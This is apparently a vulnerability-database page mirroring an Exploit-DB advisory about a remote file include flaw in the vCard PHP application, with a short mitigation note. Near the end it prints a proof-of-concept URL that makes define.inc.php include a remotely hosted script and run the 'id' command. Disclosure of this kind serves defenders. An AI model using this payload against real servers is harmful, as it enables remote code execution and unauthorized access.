header-logo
Suggest Exploit
vendor:
vCard
by:
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: vCard
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

vCard Remote File Include Vulnerability

vCard is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Mitigation:

Apply patches or updates provided by the vendor. Input validation should be implemented to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15207/info

vCard is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

http://www.example.com/vCard/admin/define.inc.php?match=http://www.example.com/cmd.gif?&cmd=id

Navigation

Suggest Exploit

Services By CQR